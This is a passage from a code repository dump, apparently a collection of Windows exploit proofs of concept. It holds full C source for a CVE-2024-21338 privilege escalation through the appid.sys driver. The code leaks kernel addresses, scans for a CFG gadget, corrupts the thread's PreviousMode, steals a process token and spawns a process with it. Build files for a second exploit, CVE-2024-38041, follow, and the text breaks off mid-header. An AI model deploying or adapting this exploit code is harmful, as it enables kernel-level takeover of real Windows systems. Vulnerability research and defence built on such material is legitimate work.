handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH) 109 | { 110 | if (handleTableInfo != NULL) 111 | { 112 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes); 113 | } 114 | 115 | else 116 | { 117 | handleTableInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes); 118 | } 119 | } 120 | 121 | if (status == 0) 122 | { 123 | for (ULONG i = 0; i < handleTableInfo->NumberOfHandles; i++) 124 | { 125 | if (handleTableInfo->Handles[i].UniqueProcessId == GetCurrentProcessId() && handleTableInfo->Handles[i].HandleValue == (USHORT)hFile) 126 | { 127 | tokenAddress = (UINT_PTR)handleTableInfo->Handles[i].Object; 128 | break; 129 | } 130 | } 131 | } 132 | else 133 | { 134 | if (handleTableInfo != NULL) 135 | { 136 | wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status); 137 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 138 | CloseHandle(hDuplicatedHandle); 139 | return 0; 140 | } 141 | } 142 | 143 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 144 | 145 | return tokenAddress; 146 | } 147 | 148 | UINT_PTR GetKernelModuleAddress(const char* TargetModule) 149 | { 150 | NTSTATUS status; 151 | ULONG ulBytes = 0; 152 | PSYSTEM_MODULE_INFORMATION handleTableInfo = NULL; 153 | 154 | while ((status = NtQuerySystemInformation(SystemModuleInformation, handleTableInfo, ulBytes, &ulBytes)) == STATUS_INFO_LENGTH_MISMATCH) 155 | { 156 | if (handleTableInfo != NULL) 157 | { 158 | handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, handleTableInfo, 2 * ulBytes); 159 | } 160 | 161 | else 162 | { 163 | handleTableInfo = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 2 * ulBytes); 164 | } 165 | } 166 | 167 | if (status == 0) 168 | { 169 | for (ULONG i = 0; i < handleTableInfo->ModulesCount; i++) 170 | { 171 | char* moduleName = strstr(handleTableInfo->Modules[i].Name, TargetModule); 172 | if (moduleName != NULL) 173 | { 174 | return (UINT_PTR)handleTableInfo->Modules[i].ImageBaseAddress; 175 | } 176 | } 177 | } 178 | else 179 | { 180 | if (handleTableInfo != NULL) 181 | { 182 | wprintf(L"[!] NtQuerySystemInformation failed. (NTSTATUS code: 0x%X)\n", status); 183 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 184 | return 0; 185 | } 186 | } 187 | 188 | HeapFree(GetProcessHeap(), 0, handleTableInfo); 189 | 190 | return 0; 191 | } 192 | 193 | int SendRequest(HANDLE hDevice, PVOID inputbuffer, size_t inputbufferLen) 194 | { 195 | IO_STATUS_BLOCK ioStatus; 196 | NTSTATUS status; 197 | ULONG dwbytesreturned = 0; 198 | 199 | status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus, IOCTL_AipSmartHashImageFile, inputbuffer, inputbufferLen, NULL, dwbytesreturned); 200 | 201 | if (status == NOERROR) 202 | { 203 | return 1; 204 | } 205 | else 206 | { 207 | wprintf(L"[!] NtDeviceIoControlFile failed with 0x%X\n", status); 208 | return 0; 209 | } 210 | } 211 | 212 | BOOL ScanSectionForPattern(HANDLE hProcess, LPVOID lpBaseAddress, SIZE_T dwSize, BYTE* pattern, SIZE_T patternSize, LPVOID* lpFoundAddress) { 213 | BYTE* buffer = (BYTE*)malloc(dwSize); 214 | SIZE_T bytesRead; 215 | 216 | if (!ReadProcessMemory(hProcess, lpBaseAddress, buffer, dwSize, &bytesRead)) { 217 | free(buffer); 218 | return FALSE; 219 | } 220 | 221 | for (SIZE_T i = 0; i < dwSize - patternSize; i++) { 222 | BOOL found = TRUE; 223 | for (SIZE_T j = 0; j < patternSize; j++) { 224 | if (buffer[i + j] != pattern[j]) { 225 | found = FALSE; 226 | break; 227 | } 228 | } 229 | if (found) { 230 | *lpFoundAddress = (LPVOID)((DWORD_PTR)lpBaseAddress + i); 231 | free(buffer); 232 | return TRUE; 233 | } 234 | } 235 | 236 | free(buffer); 237 | return FALSE; 238 | } 239 | 240 | UINT_PTR FindPattern(HMODULE hModule) 241 | { 242 | UINT_PTR relativeOffset = 0; 243 | 244 | PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)hModule; 245 | PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)((LPBYTE)hModule + pDosHeader->e_lfanew); 246 | PIMAGE_SECTION_HEADER pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders); 247 | 248 | LPVOID lpFoundAddress = NULL; 249 | 250 | for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++) { 251 | if (strcmp((CHAR*)pSectionHeader[i].Name, "PAGE") == 0) { 252 | LPVOID lpSectionBaseAddress = (LPVOID)((LPBYTE)hModule + pSectionHeader[i].VirtualAddress); 253 | SIZE_T dwSectionSize = pSectionHeader[i].Misc.VirtualSize; 254 | 255 | // Pattern of bytes for nt!ExpProfileDelete 256 | // Learned hard way that CFG is such sensitive to even missing a single byte 257 | BYTE pattern[] = {0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x83, 0x79, 0x30, 0x00, 0x48, 0x8B, 0xD9, 0x74}; 258 | SIZE_T patternSize = sizeof(pattern); 259 | 260 | if (ScanSectionForPattern(GetCurrentProcess(), lpSectionBaseAddress, dwSectionSize, pattern, patternSize, &lpFoundAddress)) { 261 | printf("\t[*] ExpProfileDelete function found in the PAGE section of ntoskrnl.exe.\n"); 262 | printf("\t[*] Starting address of ExpProfileDelete: 0x%p\n", lpFoundAddress); 263 | 264 | // Calculate the relative offset 265 | relativeOffset = (UINT_PTR)lpFoundAddress - (UINT_PTR)hModule; 266 | printf("\t[*] Relative offset of ExpProfileDelete: 0x%p\n", (LPVOID)relativeOffset); 267 | } 268 | else { 269 | printf("\t[!] ExpProfileDelete function not found in the PAGE section of ntoskrnl.exe.\n"); 270 | } 271 | 272 | break; 273 | } 274 | } 275 | 276 | return relativeOffset; 277 | } 278 | 279 | int exploit() 280 | { 281 | size_t offsetOfPreviousMode = 0; 282 | size_t bufferLength = 0; 283 | OSVERSIONINFOEXW osInfo = { 0 }; 284 | CFG_FUNCTION_WRAPPER cfgFunction = { 0 }; 285 | void* userBuffer = CheckWindowsVersionAndSetOffsets(&offsetOfPreviousMode, &osInfo); 286 | 287 | if (!userBuffer) { 288 | wprintf(L"Failed to allocate or determine the correct user buffer.\n"); 289 | return -1; // Error handling 290 | } 291 | 292 | ULONG_PTR PrevMode = NULL; 293 | NTSTATUS status; 294 | DWORD dwBytesReturned = 0; 295 | HANDLE hDevice, eventHandle = NULL; 296 | UNICODE_STRING deviceName; 297 | OBJECT_ATTRIBUTES objAttr; 298 | IO_STATUS_BLOCK ioStatus; 299 | RtlInitUnicodeString(&deviceName, L"\\Device\\AppID"); 300 | InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, NULL, NULL, NULL); 301 | wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer); 302 | status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE, 303 | &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL, 304 | FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0); 305 | 306 | if (status != 0) 307 | { 308 | wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status); 309 | return -1; 310 | } 311 | 312 | wprintf(L"[+] Opened a handle successfully %p\n", hDevice); 313 | wprintf(L"[*] Leaking the current ETHREAD address\n"); 314 | UINT_PTR ETHREADAddress = GetETHREADAddress(); 315 | UINT_PTR FILE_OBJECT_Address = GetFILE_OBJECT_Address(); 316 | UINT_PTR ntoskrnlKernelBase = GetKernelModuleAddress("ntoskrnl.exe"); 317 | HMODULE ntoskrnlUserBase = LoadLibraryExW(L"C:\\Windows\\System32\\ntoskrnl.exe", NULL, 0); 318 | 319 | if (!ETHREADAddress && !ntoskrnlKernelBase && !ntoskrnlUserBase && !FILE_OBJECT_Address) 320 | { 321 | wprintf(L"[!] Failed to leak the ETHREAD/KernelBase address\n"); 322 | return -1; 323 | } 324 | 325 | wprintf(L"[+] Leaked ETHREAD address: 0x%p\n", ETHREADAddress); 326 | 327 | PrevMode = ETHREADAddress + offsetOfPreviousMode; 328 | 329 | UINT_PTR reloffset = FindPattern(ntoskrnlUserBase); 330 | 331 | UINT_PTR CFG_GADGET = ntoskrnlKernelBase + reloffset; 332 | 333 | wprintf(L"[+] Our Thread PreviousMode Kernel Address => %p\n", PrevMode); 334 | wprintf(L"[+] FILE_OBJECT Address => %p\n", FILE_OBJECT_Address); 335 | wprintf(L"[+] CFG Gadget Kernel Base Address => %p\n", ntoskrnlKernelBase); 336 | wprintf(L"[+] CFG Gadget User Base Address => %p\n", ntoskrnlUserBase); 337 | wprintf(L"[+] CFG Gadget Address => %p\n", CFG_GADGET); 338 | 339 | 340 | if (osInfo.dwBuildNumber < 22000) { 341 | USER_BUFFER_W10* bufferW10 = (USER_BUFFER_W10*)userBuffer; 342 | 343 | cfgFunction.FunctionPointer = CFG_GADGET; 344 | // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in ObfDereferenceObjectWithTag 345 | UINT_PTR prevModeObf = PrevMode + 0x30; 346 | 347 | bufferW10->FirstArg = prevModeObf; // +0x00 348 | bufferW10->Value = FILE_OBJECT_Address; // +0x08 349 | bufferW10->PtrToFunctionWrapper = (UINT_PTR)&cfgFunction; // +0x10 350 | 351 | bufferLength = sizeof(USER_BUFFER_W10); 352 | } 353 | else 354 | { 355 | USER_BUFFER_W11* bufferW11 = (USER_BUFFER_W11*)userBuffer; 356 | 357 | cfgFunction.FunctionPointer = CFG_GADGET; 358 | // Add 0x30 because of lock xadd qword ptr [rsi-30h], rbx in ObfDereferenceObjectWithTag 359 | UINT_PTR prevModeObf = PrevMode + 0x30; 360 | 361 | bufferW11->FirstArg = prevModeObf; // +0x00 362 | bufferW11->Value = FILE_OBJECT_Address; // +0x08 363 | bufferW11->PtrToFunctionWrapper = (UINT_PTR)&cfgFunction; // +0x10 364 | bufferW11->Unknown = NULL; // +0x18 365 | 366 | bufferLength = sizeof(USER_BUFFER_W11); 367 | } 368 | 369 | wprintf(L"[*] Sending the request to trigger the bug\n"); 370 | char* buffer = (char*)malloc(sizeof(CHAR)); 371 | if (userBuffer) 372 | { 373 | if (SendRequest(hDevice, userBuffer, bufferLength)) 374 | { 375 | wprintf(L"[+] Sent the request successfully\n"); 376 | } 377 | else 378 | { 379 | wprintf(L"[!] Failed to send the request\n"); 380 | return -1; 381 | } 382 | wprintf(L"[+] Request Successful!\n"); 383 | wprintf(L"[+] Checking PreviousMode...\n"); 384 | NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)buffer, (PVOID)PrevMode, sizeof(CHAR), &dwBytesReturned); 385 | wprintf(L"[*] PreviousMode => %d\n", *buffer); 386 | } 387 | 388 | wprintf(L"[+] Exploit Done!\n"); 389 | wprintf(L"[+] Starting cleanup...\n"); 390 | Sleep(2000); 391 | *buffer = 1; 392 | NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)PrevMode, (PVOID)buffer, sizeof(CHAR), &dwBytesReturned); 393 | wprintf(L"[+] Cleanup Done!.\n[+] Press Enter To End!\n"); 394 | getchar(); 395 | 396 | free(userBuffer); 397 | free(buffer); 398 | NtClose(hDevice); 399 | 400 | return 0; 401 | } -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/CVE-2024-21338/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "Common.h" 6 | 7 | pNtAdjustPrivilegesToken NtAdjustPrivilegesToken = NULL; 8 | pNtOpenProcessToken NtOpenProcessToken = NULL; 9 | pNtOpenProcess NtOpenProcess = NULL; 10 | pNtWriteVirtualMemory NtWriteVirtualMemory = NULL; 11 | pNtDuplicateToken NtDuplicateToken = NULL; 12 | pNtSetInformationThread NtSetInformationThread = NULL; 13 | pNtQueryInformationToken NtQueryInformationToken = NULL; 14 | pNtClose NtClose = NULL; 15 | pNtDeviceIoControlFile NtDeviceIoControlFile = NULL; 16 | pNtCreateFile NtCreateFile = NULL; 17 | pNtQuerySystemInformation NtQuerySystemInformation = NULL; 18 | pRtlInitUnicodeString RtlInitUnicodeString = NULL; 19 | pRtlGetVersion RtlGetVersion = NULL; 20 | 21 | HANDLE currentProcessHandle = ((HANDLE)(LONG_PTR)-1); 22 | HANDLE currentThreadHandle = ((HANDLE)(LONG_PTR)-2); 23 | 24 | void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid); 25 | 26 | int init_ntdll() 27 | { 28 | HMODULE hNtdll = GetModuleHandleW(L"ntdll"); 29 | if (hNtdll == NULL) 30 | { 31 | wprintf(L"[!] Failed to load ntdll.dll! (Error code: %d)\n", GetLastError()); 32 | return 0; 33 | } 34 | 35 | RtlGetVersion = (pRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion"); 36 | NtAdjustPrivilegesToken = (pNtAdjustPrivilegesToken)GetProcAddress(hNtdll, "NtAdjustPrivilegesToken"); 37 | NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory"); 38 | NtOpenProcessToken = (pNtOpenProcessToken)GetProcAddress(hNtdll, "NtOpenProcessToken"); 39 | NtOpenProcess = (pNtOpenProcess)GetProcAddress(hNtdll, "NtOpenProcess"); 40 | NtDuplicateToken = (pNtDuplicateToken)GetProcAddress(hNtdll, "NtDuplicateToken"); 41 | NtSetInformationThread = (pNtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread"); 42 | NtQueryInformationToken = (pNtQueryInformationToken)GetProcAddress(hNtdll, "NtQueryInformationToken"); 43 | NtClose = (pNtClose)GetProcAddress(hNtdll, "NtClose"); 44 | 45 | NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); 46 | RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString"); 47 | NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile"); 48 | NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile"); 49 | 50 | if (!NtAdjustPrivilegesToken && !NtOpenProcess && !NtDuplicateToken && !NtOpenProcessToken 51 | && !NtSetInformationThread && !NtQueryInformationToken && !NtClose && 52 | !NtQuerySystemInformation && !RtlInitUnicodeString && !NtCreateFile && !NtDeviceIoControlFile && !RtlGetVersion && !NtWriteVirtualMemory) 53 | { 54 | wprintf(L"[!] Failed to resolve ntdll functions\n"); 55 | return 0; 56 | } 57 | 58 | return 1; 59 | } 60 | 61 | void spawnShell(HANDLE duplicatedTokenHandle, int64_t dwPid) 62 | { 63 | WCHAR selfPath[MAX_PATH] = { 0 }; 64 | if (!GetModuleFileNameW(NULL, selfPath, 100)) { 65 | wprintf(L"Failed to get module file name.\n"); 66 | return -1; 67 | } 68 | WCHAR cmdLine[MAX_PATH] = { 0 }; 69 | PROCESS_INFORMATION pi = { 0 }; 70 | STARTUPINFO si = { 0 }; 71 | 72 | if (dwPid != 0) 73 | { 74 | if (swprintf_s(cmdLine, MAX_PATH, L"%s %lld 0", selfPath, dwPid) == -1) { 75 | wprintf(L"ERROR: Failed to format command line.\n"); 76 | return -1; 77 | } 78 | } 79 | else 80 | { 81 | if (wcscpy_s(cmdLine, MAX_PATH, selfPath) != 0) { 82 | wprintf(L"ERROR: Failed to copy selfPath to cmdLine.\n"); 83 | return -1; 84 | } 85 | } 86 | 87 | // Set up STARTUPINFO 88 | si.cb = sizeof(si); 89 | si.lpDesktop = L"Winsta0\\Default"; 90 | si.dwFlags = STARTF_USESHOWWINDOW; 91 | si.wShowWindow = SW_SHOW; 92 | 93 | // This will fail with ACCESS_DENIED if the local service doesn't have the permissions to access the directory 94 | BOOL bResult = CreateProcessAsUserW( 95 | duplicatedTokenHandle, 96 | NULL, 97 | cmdLine, 98 | NULL, 99 | NULL, 100 | FALSE, 101 | 0, 102 | NULL, 103 | NULL, 104 | &si, 105 | &pi 106 | ); 107 | 108 | if (!bResult) { 109 | wprintf(L"CreateProcessAsUserW failed with error %ld\n", GetLastError()); 110 | } 111 | else { 112 | wprintf(L"Process created successfully.\n"); 113 | WaitForSingleObject(pi.hProcess, INFINITE); 114 | CloseHandle(pi.hProcess); 115 | CloseHandle(pi.hThread); 116 | } 117 | } 118 | 119 | BOOL IsRunningAsSystem() { 120 | HANDLE tokenHandle = NULL; 121 | NTSTATUS status; 122 | PTOKEN_USER pTokenUser = NULL; 123 | ULONG dwSize = 0; 124 | LPWSTR sidString = NULL; 125 | BOOL result = FALSE; 126 | 127 | status = NtOpenProcessToken(currentProcessHandle, TOKEN_QUERY, &tokenHandle); 128 | if (status != 0) { 129 | wprintf(L"NtOpenProcessToken failed. Status: 0x%x\n", status); 130 | return FALSE; 131 | } 132 | 133 | status = NtQueryInformationToken(tokenHandle, TokenUser, NULL, 0, &dwSize); 134 | if (status != 0xC0000023) { 135 | wprintf(L"NtQueryInformationToken (1) failed. Status: 0x%x\n", status); 136 | NtClose(tokenHandle); 137 | return FALSE; 138 | } 139 | 140 | pTokenUser = (PTOKEN_USER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSize); 141 | if (!pTokenUser) { 142 | wprintf(L"HeapAlloc failed.\n"); 143 | NtClose(tokenHandle); 144 | return FALSE; 145 | } 146 | 147 | status = NtQueryInformationToken(tokenHandle, TokenUser, pTokenUser, dwSize, &dwSize); 148 | if (status != 0) { 149 | wprintf(L"NtQueryInformationToken (2) failed. Status: 0x%x\n", status); 150 | HeapFree(GetProcessHeap(), 0, pTokenUser); 151 | NtClose(tokenHandle); 152 | return FALSE; 153 | } 154 | 155 | if (!ConvertSidToStringSidW(pTokenUser->User.Sid, &sidString)) { 156 | wprintf(L"ConvertSidToStringSidW failed.\n"); 157 | HeapFree(GetProcessHeap(), 0, pTokenUser); 158 | NtClose(tokenHandle); 159 | return FALSE; 160 | } 161 | 162 | // NT AUTHORITY\LOCAL SERVICE 163 | if (_wcsicmp(sidString, L"S-1-5-19") == 0) { 164 | result = TRUE; 165 | } 166 | 167 | LocalFree(sidString); 168 | HeapFree(GetProcessHeap(), 0, pTokenUser); 169 | NtClose(tokenHandle); 170 | 171 | return result; 172 | } 173 | 174 | int wmain(int argc, wchar_t* argv[]) 175 | { 176 | if (!init_ntdll()) 177 | { 178 | return -1; 179 | } 180 | 181 | if (IsRunningAsSystem()) { 182 | wprintf(L"The process is running as NT AUTHORITY\\LOCAL SERVICE.\n"); 183 | exploit(); 184 | ExitProcess(0); 185 | } 186 | else { 187 | wprintf(L"The process is not running as NT AUTHORITY\\LOCAL SERVICE.\n"); 188 | 189 | if (3 != argc) 190 | { 191 | wprintf(L"Usage: %ls ", argv[0]); 192 | return -1; 193 | } 194 | 195 | HANDLE duplicatedTokenHandle = NULL; 196 | int64_t dwPid = 0; 197 | int64_t dwPid2 = 0; 198 | dwPid = _wtoi(argv[1]); 199 | dwPid2 = _wtoi(argv[2]); 200 | if (!dwPid && !dwPid2) 201 | { 202 | wprintf(L"PIDs must be numeric.\r\n"); 203 | return -2; 204 | } 205 | wprintf(L"[+] Stealing token from process #%lld.\r\n", dwPid); 206 | stealToken(&duplicatedTokenHandle, dwPid); 207 | if (!duplicatedTokenHandle) 208 | { 209 | wprintf(L"Token stealing failed.\r\n"); 210 | return -3; 211 | } 212 | spawnShell(duplicatedTokenHandle, dwPid2); 213 | } 214 | 215 | return 0; 216 | } 217 | 218 | void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid) 219 | { 220 | HANDLE targetProcessHandle = NULL; 221 | HANDLE duplicatedTokenHandle = NULL; 222 | HANDLE currentTokenHandle = NULL; 223 | NTSTATUS Status; 224 | TOKEN_PRIVILEGES tp; 225 | 226 | Status = NtOpenProcessToken(currentProcessHandle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ¤tTokenHandle); 227 | CHECK_STATUS(L"NtOpenProcessToken() returned ", Status); 228 | 229 | tp.PrivilegeCount = 1; 230 | tp.Privileges[0].Luid.HighPart = 0; 231 | tp.Privileges[0].Luid.LowPart = LUID_SE_DEBUG; 232 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 233 | Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 234 | if(Status != STATUS_NOT_ALL_ASSIGNED) 235 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status); 236 | 237 | tp.PrivilegeCount = 1; 238 | tp.Privileges[0].Luid.HighPart = 0; 239 | tp.Privileges[0].Luid.LowPart = LUID_SE_IMPERSONATE; 240 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 241 | Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 242 | if (Status != STATUS_NOT_ALL_ASSIGNED) 243 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #2 returned ", Status); 244 | 245 | DWORD dwDesiredAccess; 246 | OBJECT_ATTRIBUTES Obja; 247 | CLIENT_ID ClientId; 248 | 249 | dwDesiredAccess = PROCESS_QUERY_INFORMATION; 250 | ClientId.UniqueThread = NULL; 251 | ClientId.UniqueProcess = (HANDLE)(dwPid); 252 | InitializeObjectAttributes(&Obja, NULL, 0, NULL, NULL, NULL); 253 | 254 | Status = NtOpenProcess(&targetProcessHandle, dwDesiredAccess, &Obja, &ClientId); // Cannot access PPL processes 255 | CHECK_STATUS(L"NtOpenProcess() returned ", Status); 256 | 257 | HANDLE targetTokenHandle = NULL; 258 | 259 | Status = NtOpenProcessToken( 260 | targetProcessHandle, 261 | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, 262 | &targetTokenHandle); 263 | CHECK_STATUS(L"NtOpenProcessToken() returned ", Status); 264 | 265 | OBJECT_ATTRIBUTES Obja2; 266 | SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 267 | 268 | SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE); 269 | SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation; 270 | SecurityQualityOfService.ContextTrackingMode = FALSE; 271 | SecurityQualityOfService.EffectiveOnly = FALSE; 272 | InitializeObjectAttributes(&Obja2, NULL, 0, NULL, NULL, &SecurityQualityOfService); 273 | 274 | Status = NtDuplicateToken( 275 | targetTokenHandle, 276 | MAXIMUM_ALLOWED, 277 | &Obja2, 278 | FALSE, 279 | TokenImpersonation, 280 | &duplicatedTokenHandle); 281 | CHECK_STATUS(L"NtDuplicateToken() returned ", Status); 282 | 283 | tp.PrivilegeCount = 1; 284 | tp.Privileges[0].Luid.HighPart = 0; 285 | tp.Privileges[0].Luid.LowPart = LUID_SE_ASSIGNPRIMARYTOKEN; 286 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 287 | 288 | Status = NtAdjustPrivilegesToken(duplicatedTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 289 | if(Status != STATUS_NOT_ALL_ASSIGNED) 290 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status); 291 | 292 | Status = NtSetInformationThread( 293 | currentThreadHandle, 294 | ThreadImpersonationToken, 295 | (PVOID)&duplicatedTokenHandle, 296 | sizeof(duplicatedTokenHandle)); 297 | CHECK_STATUS(L"NtSetInformationThread() returned ", Status); 298 | 299 | *duplicateTokenHandleOut = duplicatedTokenHandle; 300 | } -------------------------------------------------------------------------------- /Windows/CVE-2024-21338/readme.md: -------------------------------------------------------------------------------- 1 | # PoC For CVE-2024-21338 2 | This exploit targets appid.sys driver and works for both Windows 10 & 11 with HVCI enabled. 3 | 4 | ![Screenshot](CVE-2024-21338.png) 5 | 6 | # Credits 7 | Amazing blog post done by [Avast](https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/) 8 | -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/CVE-2024-38041.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.8.34330.188 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-38041", "CVE-2024-38041.vcxproj", "{E0658208-2CB1-4494-B0CF-D45292BCABDF}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x64.ActiveCfg = Debug|x64 17 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x64.Build.0 = Debug|x64 18 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x86.ActiveCfg = Debug|Win32 19 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x86.Build.0 = Debug|Win32 20 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x64.ActiveCfg = Release|x64 21 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x64.Build.0 = Release|x64 22 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x86.ActiveCfg = Release|Win32 23 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {8963674B-1FF7-4286-8BFA-C77F21BFC144} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/CVE-2024-38041.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 17.0 23 | Win32Proj 24 | {e0658208-2cb1-4494-b0cf-d45292bcabdf} 25 | CVE202438041 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | 84 | 85 | 86 | 87 | Level3 88 | true 89 | true 90 | true 91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | true 98 | true 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | true 118 | true 119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | MultiThreaded 122 | 123 | 124 | Console 125 | true 126 | true 127 | true 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/CVE-2024-38041.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/CVE-2024-38041.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/Common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | 5 | int exploit(); 6 | 7 | // https://github.com/gtworek/PSBits/blob/e233709faa16a974d3af606c2dafe37ffe8f7aa9/Misc/TokenStealWithSyscalls.c 8 | #define LUID_SE_ASSIGNPRIMARYTOKEN 3 9 | #define LUID_SE_DEBUG 20 10 | #define LUID_SE_IMPERSONATE 29 11 | #define 